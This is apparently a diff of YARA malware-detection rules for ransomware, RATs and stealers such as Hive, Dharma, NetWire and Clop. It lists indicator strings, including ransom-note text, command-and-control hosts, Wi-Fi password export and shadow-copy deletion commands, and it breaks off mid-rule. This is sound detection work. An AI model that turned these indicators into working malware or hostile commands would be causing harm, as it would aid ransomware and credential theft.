fullword ascii - $s3 = "WriteAllText" fullword ascii - $s4 = "DownloadString" fullword ascii - $s5 = "WriteByte" fullword ascii + $s1 = "README.VOVALEX.txt" fullword ascii + $s2 = "\\src\\phobos\\std\\" ascii + $s3 = "LoadLibraryA(\"Advapi32.dll\")" fullword ascii + $s4 = "Failed to spawn process \"" fullword ascii + $s5 = "=== Bypassed ===" fullword ascii + $s6 = "If you don't know where to buy" ascii condition: - uint16(0)==0x5a4d and ( all of ($s*) or (1 of ($ua*) and ($s1) and 2 of ($s*))) + uint16(0)==0x5a4d and 4 of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Hive : FILE +rule DITEKSHEN_MALWARE_Win_Dharma : FILE { meta: - description = "Detects Hive ransomware" + description = "Detects Dharma ransomware" author = "ditekSHen" - id = "7b79dc54-01c7-5667-acf5-a32cd7a45b54" - date = "2024-09-06" - modified = "2024-09-06" + id = "070be95e-8d9c-5c4d-9d46-cddea6dbb682" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L6610-L6647" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "14c20ff2fa62d80eed0f4f364e24d93d493d4f3b47f664983714940afa74046f" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L4720-L4728" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "2727b2c0295e32699e08c3c79d7ac6fd52f1520358ac23290d40df428c969f4b" score = 75 - quality = 73 + quality = 75 tags = "FILE" strings: - $url1 = "http://hivecust" ascii - $url2 = "http://hiveleakdb" ascii - $s1 = "encrypt_files.go" ascii - $s2 = "erase_key.go" ascii - $s3 = "kill_processes.go" ascii - $s4 = "remove_shadow_copies.go" ascii - $s5 = "stop_services_windows.go" ascii - $s6 = "remove_itself_windows.go" ascii - $x1 = "/encryptor/" ascii - $x2 = "HOW_TO_DECRYPT.txt" ascii - $x3 = "FilesEncrypted" fullword ascii - $x4 = "EncryptionStarted" fullword ascii - $x5 = "encryptFilesGroup" fullword ascii - $x6 = "Your data will be undecryptable" ascii - $x7 = "- Do not fool yourself. Encryption has perfect secrecy" ascii - $v1_1 = ".EncryptFiles." ascii - $v1_2 = ".EncryptFilename." ascii - $v1_3 = ")*struct { F uintptr; .autotmp_14 string }" ascii - $v1_4 = "D*struct { F uintptr; data *[]uint8; seed *uint8; fnc *main.decFunc }" ascii - $v1_5 = "golang.org/x/sys/windows.getSystemWindowsDirectory" ascii - $v1_6 = "path/filepath.WalkDir" ascii - $v2_1 = "taskkill /f /im" ascii - $v2_2 = "schtasks /delete /tn" ascii - $v2_3 = "encfile.txt" ascii - $v2_4 = "README.html" ascii - $v2_5 = "total encrypt %v/%v" ascii - $v2_6 = "<b>ITSSHOWKEY</b>" ascii - $v2_7 = "Recovery your files." ascii - $v2_8 = "yaml:\"send_host\"" ascii - $v2_9 = "yaml:\"ignore_dir\"" ascii + $s1 = "C:\\crysis\\Release\\PDB\\payload.pdb" fullword ascii condition: - uint16(0)==0x5a4d and ( all of ($url*) or all of ($s*) or 4 of ($x*) or 5 of ($v1*) or 5 of ($v2*) or (4 of ($v2*) and #v2_1>10)) + uint16(0)==0x5a4d and all of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Spyro : FILE +rule DITEKSHEN_MALWARE_Win_Cryptolocker : FILE { meta: - description = "Detects Spyro / VoidCrypt / Limbozar ransomware" + description = "Detects Cryptolocker ransomware variants (Betarasite)" author = "ditekSHen" - id = "8b3273c4-827e-50ce-983e-a5843f6b5a78" - date = "2024-09-06" - modified = "2024-09-06" + id = "4c6d714d-1fb1-55ce-8022-40f6f634e2cd" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L6649-L6675" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "2e3be361f6d4283fd312a4486eaa39d6594813937cc3f62dbb603babeff17929" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L4730-L4752" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "e1700e8ace338c25119305878e8bc52210506bd42183007985ba9601abdab87b" score = 75 - quality = 75 + quality = 73 tags = "FILE" strings: - $s1 = "Decrypt-info.txt" ascii wide - $s2 = "AbolHidden" ascii wide - $s3 = "C:\\ProgramData\\prvkey" ascii wide - $s4 = ".?AV?$TF_CryptoSystemBase@VPK_Encryptor@CryptoPP" ascii - $s5 = "C:\\Users\\LEGION\\" ascii - $s6 = "C:\\ProgramData\\pkey.txt" fullword ascii - $s7 = ".Spyro" fullword ascii - $m1 = "Go to C:\\ProgramData\\ or in Your other Drives" wide - $m2 = "saving prvkey.txt.key file will cause" wide - $m3 = "in Case of no Answer:" wide - $m4 = "send us prvkey*.txt.key" wide - $m5 = "Somerhing went wrong while writing payload on disk" ascii - $m6 = "this country is forbidden.\"}" ascii - $c1 = "Voidcrypt/1.0" ascii - $c2 = "h1dd3n.cc" ascii - $c3 = "/voidcrypt/index.php" ascii - $c4 = "&user=" ascii - $c5 = "&disk-size=" ascii - $c6 = "unique-id=" ascii + $x1 = "CryptoLocker" fullword wide + $x2 = ".betarasite" fullword wide + $x3 = "CMSTPBypass" fullword ascii + $s1 = "CommandToExecute" fullword ascii + $s2 = "SetInfFile" fullword ascii + $s3 = "SchoolPrject1" ascii + $s4 = "$730d5f64-bd57-47c1-9af4-d20aec714d02" fullword ascii + $s5 = "Encrypt" fullword ascii + $s6 = "Invalide Key! Please Try Again." fullword wide + $s7 = "RegAsm" fullword wide + $s8 = "Your key will be destroyed" wide + $s9 = "encrypted using RC4 and RSA-2048" wide + $c1 = "https://coinbase.com" fullword wide + $c2 = "https://localbictoins.com" fullword wide + $c3 = "https://bitpanda.com" fullword wide condition: - uint16(0)==0x5a4d and (5 of ($s*) or 4 of ($c*) or 3 of ($m*) or 8 of them ) + uint16(0)==0x5a4d and ( all of ($x*) or all of ($s*) or (2 of ($x*) and 5 of ($s*)) or ( all of ($c*) and 1 of ($x*) and 2 of ($s*))) } import "pe" -rule DITEKSHEN_MALWARE_Win_Darkvnc : FILE +rule DITEKSHEN_MALWARE_Win_PWSH_Poshwifistealer { meta: - description = "Detects DarkVNC" + description = "Detects PowerShell PoshWiFiStealer" author = "ditekSHen" - id = "3c7d215c-fcca-5a0f-b59c-d84fd894677a" - date = "2024-09-06" - modified = "2024-09-06" + id = "69ac123d-b746-57f1-a488-547f9a9cdd86" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L6677-L6696" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "b0dbde04c0a05e476d505b92cf7dbf3b4ef0dd9e88eafcd21b7a7d0e3623abbd" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L4754-L4765" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "769349360b5d22226a5339a9e8471d06731dc522475c9385c1c145a0488e0ad1" score = 75 quality = 75 - tags = "FILE" + tags = "" strings: - $s1 = "USR-%s(%s)_%S-%S%u%u" fullword wide - $s2 = "BOT-%s(%s)_%S-%S%u%u" fullword wide - $s3 = "USR-UnicodeErr(Err)_%s-%s%u%u" fullword ascii - $s4 = "BOT-UnicodeErr(Err)_%s-%s%u%u" fullword ascii - $s5 = "PRM_STRG" fullword wide - $s6 = "bot_shell >" ascii - $s7 = "monitor_off / monitor_on" ascii - $s8 = "kbd_off / kbd_on" ascii - $s9 = "ActiveDll: Dll inject thread for process 0x%x terminated with status: %u" ascii - $s10 = "PsSup: File %s successfully started with parameter \"%s\"" ascii - $s11 = "PsSup: ShellExecute failed. File: %s, error %u" ascii - $s12 = "#hvnc" fullword ascii + $s1 = "netsh wlan export profile" ascii + $s2 = "Send-MailMessage" ascii + $u1 = "https://github.com/axel05869/Wifi-Grab" ascii + $u2 = "/exploitechx/wifi-password-extractor" ascii condition: - uint16(0)==0x5a4d and 5 of them + all of ($s*) or all of ($u*) } import "pe" -rule DITEKSHEN_MALWARE_Win_RSJON : FILE +rule DITEKSHEN_MALWARE_Win_Steamhook : FILE { meta: - description = "Detects RSJON / Ryzerlo / HiddenTear ransomware" + description = "Detects potential Steam stealer" author = "ditekSHen" - id = "7cc3e863-b594-51a9-9d41-68021ce3b97c" - date = "2024-09-06" - modified = "2024-09-06" + id = "7533fb83-d721-54e6-8ae1-1c840dd5a13d" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L6698-L6727" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "abfea2955bf0d0b0511ea820582cc15fbcfc38dbed71fb2a0050cd98a9311cda" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L4767-L4781" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "da743ca99fd19828e3938875acaf6544f17d884587a59623c8361f5905af4a57" score = 75 - quality = 48 + quality = 73 tags = "FILE" strings: - $pdb1 = "C:\\Users\\brknc\\source\\repos\\" ascii - $pdb2 = "\\rs-jon\\obj\\Debug\\rs-jon.pdb" ascii - $pdb3 = "\\rs-jon\\obj\\Release\\rs-jon.pdb" ascii - $x1 = "READ_ME_PLZ.txt" wide - $x2 = "Files has been encrypted with rs-jon" wide - $x3 = ".rsjon" wide - $x4 = "bitcoins or kebab" wide - $x5 = /rs[-_]jon/ fullword ascii wide - $s1 = "SPIF_UPDATEINIFILE" fullword ascii - $s2 = "SPI_SETDESKWALLPAPER" fullword ascii - $s3 = "bytesToBeEncrypted" fullword ascii - $s4 = "SendPassword" fullword ascii - $s5 = "EncryptFile" ascii - $s6 = "fWinIni" fullword ascii - $s7 = "BTCAdress" fullword ascii - $s8 = "self_destruck" fullword ascii - $c1 = "?computer_name=" wide - $c2 = "&serialnumber=" wide - $c3 = "&password=" wide - $c4 = "&allow=ransom" wide - $c5 = "://darkjon.tk/" wide - $c6 = "/rnsm/write.php" wide + $s1 = "Mozilla/4.0 (compatible; )" fullword ascii + $s2 = "/steam/upload.php" ascii + $s3 = ".*?(ssfn\\d+)" fullword ascii + $s4 = "add cookie failed..." fullword ascii + $s5 = "Content-Type: multipart/form-data; boundary=--MULTI-PARTS-FORM-DATA-BOUNDARY" fullword ascii + $pdb1 = "\\SteamHook\\Install\\" ascii + $pdb2 = "\\SteamHook\\dll\\" ascii condition: - uint16(0)==0x5a4d and (3 of ($x*) or 6 of ($s*) or 4 of ($c*) or (2 of ($c*) and 4 of ($s*)) or (1 of ($pdb*) and 1 of them )) + uint16(0)==0x5a4d and ( all of ($s*) or all of ($pdb*) or (1 of ($pdb*) and 3 of ($s*))) } import "pe" -rule DITEKSHEN_MALWARE_Win_Boxcaon : FILE +rule DITEKSHEN_MALWARE_Win_Netwire : FILE { meta: - description = "Detects IndigoZebra BoxCaon" + description = "Detects NetWire RAT" author = "ditekSHen" - id = "becbde73-8b72-5e98-8684-87068ffff71b" - date = "2024-09-06" - modified = "2024-09-06" + id = "c215f449-c725-51da-8f5b-2619bc282b22" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L6729-L6746" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "4f2f26e6678d49bfa5937511b1788a059ee10e1b5f19e53d6386199738a925a5" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L4783-L4805" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "bae4f0cd7a431336bd784ba95f6ba3396e6f0f12c081e62482ad37ff859c1f1c" score = 75 - quality = 50 + quality = 75 tags = "FILE" strings: - $s1 = "<RetCMD null>" fullword wide - $s2 = "<txt null>" fullword wide - $s3 = "C:\\Users\\Public\\%d\\" fullword wide - $s4 = "api.dropboxapi.com" fullword wide - $s5 = "/2/files/upload" fullword wide - $ts1 = "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko" ascii wide - $ts2 = "%s /A /C \"%s\" > %s" ascii wide - $ts3 = "ersInfo" ascii wide - $ts4 = "%svmpid%d.log" ascii wide - $ts5 = "%scscode%d.log" ascii wide + $x1 = "SOFTWARE\\NetWire" fullword ascii + $x2 = { 4e 65 74 57 69 72 65 00 53 4f 46 54 57 41 52 45 5c 00 } + $s1 = "User-Agent: Mozilla/4.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko" fullword ascii + $s2 = "filenames.txt" fullword ascii + $s3 = "GET %s HTTP/1.1" fullword ascii + $s4 = "[%.2d/%.2d/%d %.2d:%.2d:%.2d]" fullword ascii + $s5 = "Host.exe" fullword ascii + $s6 = "-m \"%s\"" fullword ascii + $g1 = "HostId" fullword ascii + $g2 = "History" fullword ascii + $g3 = "encrypted_key" fullword ascii + $g4 = "Install Date" fullword ascii + $g5 = "hostname" fullword ascii + $g6 = "encryptedUsername" fullword ascii + $g7 = "encryptedPassword" fullword ascii condition: - ( uint16(0)==0x5a4d and all of ($s*)) or all of ($ts*) + uint16(0)==0x5a4d and ( all of ($s*) or all of ($x*) or (1 of ($x*) and 2 of ($s*)) or ( all of ($g*) and (2 of ($s*) or 1 of ($x*)))) } import "pe" -rule DITEKSHEN_MALWARE_Win_Avoslocker : FILE +rule DITEKSHEN_MALWARE_Win_Breakstaf : FILE { meta: - description = "Hunt for AvosLocker ransomware" + description = "Detects BreakStaf ransomware" author = "ditekSHen" - id = "390e57b2-207e-5013-899a-0b04aa63a56f" - date = "2024-09-06" - modified = "2024-09-06" + id = "3c8ca485-2cb4-56fd-a1f5-16b43515cec9" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L6748-L6757" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "85601fdd13ddeb1fc0b8b98eb68e324046d60c1ae9467d083a75abebcb50e3a0" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L4807-L4827" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "56078b797c64ce77398f9b92e5677f7159d8357eafb03cf62bb30f06d4f3b2e3" score = 75 - quality = 75 + quality = 73 tags = "FILE" strings: - $s1 = "GET_YOUR_FILES_BACK.txt" ascii wide - $s2 = ".avos" fullword ascii wide + $s1 = "C:\\Program files" wide + $s2 = "C:\\Program files (x86)" wide + $s3 = "C:\\System Volume Information" wide + $s4 = "C:\\$Recycle.Bin" wide + $s5 = "C:\\Windows" wide + $s6 = ".?AVRandomNumberGenerator@Crypto" ascii + $s7 = ".?AV?$SymmetricCipherFinal@" ascii + $s8 = ".breakstaf" fullword wide nocase + $s9 = "readme.txt" fullword wide nocase + $s10 = ".VHD" fullword wide nocase + $s11 = ".vhdx" fullword wide nocase + $s12 = ".BAK" fullword wide nocase + $s13 = ".BAC" fullword wide nocase condition: - uint16(0)==0x5a4d and all of them + uint16(0)==0x5a4d and 12 of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Diavol : FILE +rule DITEKSHEN_MALWARE_Win_Kitty : FILE { meta: - description = "Detects Diavol ransomware" + description = "Detects HelloKitty ransomware, triggers on FIVEHANDS" author = "ditekSHen" - id = "df5cea04-505e-5009-b247-ba71b6d81ecc" - date = "2024-09-06" - modified = "2024-09-06" + id = "4147294a-7eff-595a-ad4f-8a84ffff960f" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L6759-L6784" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "bcc7a9dc2dcb12ded75af9d79ab0f46f0e69da9e9fe72539be6351306ed11c18" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L4829-L4847" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "3a36755c81ec70c127bb73448fc29325444b85b5f0704327fc81975c2af2e99e" score = 75 - quality = 48 + quality = 75 tags = "FILE" strings: - $s1 = "README_FOR_DECRYPT.txt" ascii wide nocase - $s2 = ".lock64" fullword ascii wide - $s3 = "LockMainDIB" ascii wide - $s4 = "locker.divided" ascii wide - $s5 = "%tob_dic%/" wide - $s6 = "%cid_bot%" wide - $m1 = "GENBOTID" ascii wide - $m2 = "SHAPELISTS" ascii wide - $m3 = "REGISTER" ascii wide - $m4 = "FROMNET" ascii wide - $m5 = "SERVPROC" ascii wide - $m6 = "SMBFAST" ascii wide - $c1 = "/Bnyar8RsK04ug/" fullword ascii - $c2 = "/landing" fullword ascii - $c3 = "/wipe" fullword ascii - $c4 = "&ip_local1=111.111.111.111&ip_local2=222.222.222.222&ip_external=2.16.7.12" fullword ascii - $c5 = "&group=" fullword ascii - $c6 = "/BnpOnspQwtjCA/register" fullword ascii + $s1 = "Kitty" wide + $s2 = "-path" fullword wide + $s3 = "select * from Win32_ShadowCopy" fullword wide + $s4 = "Win32_ShadowCopy.ID='%s'" fullword wide + $s5 = "programdata" fullword wide + $s6 = "$recycle.bin" fullword wide + $s7 = ".crypt" fullword wide + $s8 = "%s/secret/%S" wide + $s9 = "decrypts3nln3tic.onion" wide + $n1 = "read_me_lkd.txt" wide + $n2 = "DECRYPT_NOTE.txt" wide condition: - uint16(0)==0x5a4d and (4 of ($s*) or 5 of ($m*) or 4 of ($c*) or 7 of them ) + uint16(0)==0x5a4d and (5 of ($s*) or 1 of ($n*) and 4 of ($s*)) } import "pe" -rule DITEKSHEN_MALWARE_Win_Margulasrat : FILE +rule DITEKSHEN_MALWARE_Win_Dlagent07 : FILE { meta: - description = "Detects MargulasRAT" + description = "Detects delf downloader agent" author = "ditekSHen" - id = "6efabf80-9194-542d-afd2-9bf9c8e26e55" - date = "2024-09-06" - modified = "2024-09-06" + id = "a45afe84-15ae-528a-ad7e-ab9f03045789" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L6786-L6810" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "dd5b94c947d97cdc34032f2cb84b4975a1e8f510638857fb6dbe553bcff7d16e" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L4849-L4867" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "1e0001d18524d0d34ad876e67e2c4dc0495ee18a73c34f53f97367876e27b406" score = 75 quality = 75 tags = "FILE" strings: - $pdb1 = "G:\\VP-S-Fin\\memory\\" ascii - $pdb2 = "G:\\VP-S-Fin\\Margulas\\" ascii - $pdb3 = "G:\\VP-S-Fin\\remote" ascii - $pdb4 = "G:\\VP-S-Fin\\" ascii - $s1 = "/C choice /C Y /N /D Y /T 1 & Del " fullword wide - $s2 = "strToHash" fullword ascii - $s3 = "\\socking" fullword wide - $s4 = "\\wininets" fullword wide - $s5 = "ClientSocket" fullword ascii - $s6 = "new Stream()" fullword wide - $s7 = "CipherText" fullword ascii - $s8 = "WriteAllBytes" fullword ascii - $s9 = { 00 50 72 6f 63 65 73 73 00 45 78 69 73 74 73 00} - $s10 = "pxR/THCwdLuruMmw8wB8xAUvbno1yPGBTOV9IoOkAp/n7+paQm74pkzlfSKDpAKfTOV9IoOkAp9M5X0ig6QCn0zlfSKDpAKfTOV9IoOkAp" wide - $c1 = "149.248.52.61" wide - $c2 = "://vpn.nic.in" wide - $c3 = "://www.mod.gov.in/dod/sites/default/files/" wide + $s1 = "C:\\Users\\Public\\Libraries\\temp" fullword ascii + $s2 = "SOFTWARE\\Borland\\Delphi" ascii + $s3 = "Mozilla/5.0(compatible; WinInet)" fullword ascii + $o1 = { f3 a5 e9 6b ff ff ff 5a 5d 5f 5e 5b c3 a3 00 40 } + $o2 = { e8 83 d5 ff ff 8b 15 34 40 41 00 89 10 89 58 04 } + $o3 = { c3 8b c0 53 51 e8 f1 ff ff ff 8b d8 85 db 74 3e } + $o4 = { e8 5c e2 ff ff 8b c3 e8 b9 ff ff ff 89 04 24 83 } + $o5 = { 85 c0 74 1f e8 62 ff ff ff a3 98 40 41 00 e8 98 } + $o6 = { 85 c0 74 19 e8 be ff ff ff 83 3d 98 40 41 00 ff } + $x1 = "22:40:08 \"> <rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\"> <rdf:Description rdf:about=\"\"" ascii + $x2 = "uuid:A9BD8E384B2FDE118D26E6EE744C235C\" stRef:documentID=\"uuid:A8BD8E384B2FDE118D26E6EE744C235C\"/>" ascii condition: - uint16(0)==0x5a4d and ((1 of ($pdb*) and (1 of ($c*) or 3 of ($s*))) or (1 of ($c*) and 3 of ($s*)) or (6 of ($s*))) + uint16(0)==0x5a4d and ((2 of ($s*) and 5 of ($o*)) or ( all of ($s*) and 2 of ($o*)) or ( all of ($x*) and 2 of them )) } import "pe" -rule DITEKSHEN_MALWARE_Win_Lilithrat : FILE +rule DITEKSHEN_MALWARE_Win_Clop : FILE { meta: - description = "Detects LilithRAT" + description = "Detects Clop ransomware variants" author = "ditekSHen" - id = "87e56524-f557-5662-86bc-2b26e7c74aee" - date = "2024-09-06" - modified = "2024-09-06" + id = "d3c9e950-8b03-5d19-8448-9cf208813df2" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L6812-L6839" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "1e8ac8a329ff99318e12666ea1d90d21bb9b0dff656a5eb1ce741b940c99afd5" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L4869-L4889" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "a1a21100c468c4db147f97b0724b7a3aefbb92b157071bfe6f61d02768573b44" score = 75 quality = 75 tags = "FILE" - hash1 = "132870a1ae6a0bdecaa52c03cfe97a47df8786f148fa8ca113ac2a8d59e3624a" - hash2 = "ab7b6e0b28995bdeea44f20c0aba47f95e1d6ba281af3541cd2c04dc6c2a3ad9" - hash3 = "b2eeb487046ba1d341fb964069b7e83027b60003334e04e41b467e35c3d2460f" - hash4 = "cebcda044c60b709ba4ee0fa9e1e7011a6ffc17285bcc0948d27f866ec8d8f20" strings: - $pdb1 = "c:\\Users\\Groovi\\Documents\\Visual Studio 2008\\Projects\\TestDll\\" ascii - $pdb2 = "C:\\Users\\iceberg\\Downloads\\RAT-Server-master\\RAT-Server-master\\RAT\\Debug\\RAT.pdb" ascii - $pdb3 = "C:\\Users\\Samy\\Downloads\\Compressed\\Lilith-master\\Debug\\Lilith.pdb" ascii - $s1 = "log.txt" fullword ascii - $s2 = "keylog.txt" fullword ascii - $s3 = "File Listing Completed Successfully." fullword ascii - $s4 = "Download Execute" fullword ascii - $s5 = "File Downloaded and Executed Successfully." fullword ascii - $s6 = "C:\\WINDOWS\\system32\\cmd.exe" fullword ascii - $s7 = "CMD session closed" ascii - $s8 = "Restart requested: Restarting self" fullword ascii - $s9 = "Termination requested: Killing self" fullword ascii - $s10 = "Couldn't write to CMD: CMD not open" fullword ascii - $s11 = "keydump" fullword ascii - $s12 = "remoteControl" fullword ascii - $s13 = "packettype" fullword ascii + $x1 = "Cllp^_-" ascii + $s2 = "temp.dat" fullword wide + $s3 = "README_README.txt" wide + $s4 = "BEGIN PUBLIC KEY" ascii + $s5 = "runrun" wide + $s6 = "wevtutil.exe" ascii + $s7 = "%s%s.Cllp" fullword wide + $s8 = "WinCheckDRVs" fullword wide + $o1 = { 6a ff 56 89 9d 28 dd ff ff ff d0 a1 64 32 41 00 } + $o2 = { 56 89 9d 28 dd ff ff ff 15 78 32 41 00 eb 07 43 } + $o3 = { 68 ?? 34 41 00 8d 85 58 dd ff ff 50 ff d7 85 c0 } + $o4 = { 68 d0 34 41 00 50 ff d6 8b bd 28 d5 ff ff 83 c4 } + $o5 = { a1 64 32 41 00 43 56 89 9d 08 d5 ff ff ff d0 8b } condition: - uint16(0)==0x5a4d and (1 of ($pdb*) or 6 of ($s*) or (1 of ($pdb*) and 4 of ($s*))) + uint16(0)==0x5a4d and ( all of ($s*) or (1 of ($x*) and (3 of ($s*) or 4 of ($o*))) or ( all of ($o*) and 2 of ($s*)) or (4 of ($s*) and 4 of ($o*))) } import "pe" -rule DITEKSHEN_MALWARE_Win_Epicenterrat : FILE +rule DITEKSHEN_MALWARE_Win_Maktub : FILE { meta: - description = "Detects EpicenterRAT" + description = "Detects Maktub ransomware" author = "ditekSHen" - id = "6abe6e94-d7f5-5f88-96a6-a8fad599ef6a" - date = "2024-09-06" - modified = "2024-09-06" + id = "be47d858-8497-593f-865b-c3d3a5db6c2e" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L6841-L6863" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "e9086dff22e301f57c6a9bdb38fbed8e902d5b8ca20a5e5b3cda56db08d5582e" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L4891-L4905" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "5c11d04fc3088eb8a0132b9ed83748ddb7e1bbe9d03b9e884d4003181cbb6d69" score = 75 quality = 75 tags = "FILE" strings: - $pdb1 = "c:\\Users\\Zombie\\Desktop\\MutantNinja\\" ascii - $pdb2 = "\\Epicenter Client\\" ascii - $s1 = "PROCESS_LIST<%SEP%>" fullword wide - $s2 = "GETREADY_RECV_FILE<%SEP%>" fullword wide - $s3 = "DISPLAY<%SEP%>" wide - $s4 = "GETSCREEN<%SEP%>" fullword wide - $s5 = "dumpImageName" fullword ascii - $s6 = "dumpLoc" fullword ascii - $s7 = "EXPECT<%SEP%>filelist<%SEP%>" fullword wide - $s8 = "<%FSEP%>FOLDER<%FSEP%>-<%SEP%>" fullword wide - $s9 = "KILLPROC<%SEP%>" fullword wide - $s10 = "LAUNCHPROC<%SEP%>" fullword wide - $s11 = "cmd.exe /c start /b " fullword wide - $s12 = "savservice" fullword wide - $s13 = "getvrs" fullword ascii + $s1 = "Content-Disposition: attachment; filename=" ascii + $s2 = "Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0" fullword ascii + $s3 = "/tor/status-vote/current/consensus" ascii + $s4 = "/tor/server/fp/" ascii + $s5 = "/tor/rendezvous2/" ascii + $s6 = "404 Not found" fullword ascii + $s7 = /_request@\d+/ fullword ascii condition: - uint16(0)==0x5a4d and (1 of ($pdb*) or 5 of ($s*)) + uint16(0)==0x5a4d and 5 of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Lastconn : FILE +rule DITEKSHEN_MALWARE_Win_Pwshloader_Runpe01 { meta: - description = "Detects LastConn" + description = "Detects PowerShell PE loader / executer. Observed Gorgon TTPs" author = "ditekSHen" - id = "18727c30-d84d-5ffa-acd4-2cc54e553604" - date = "2024-09-06" - modified = "2024-09-06" + id = "fd44f48c-7a24-512b-8375-c9f978a8b5bd" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = 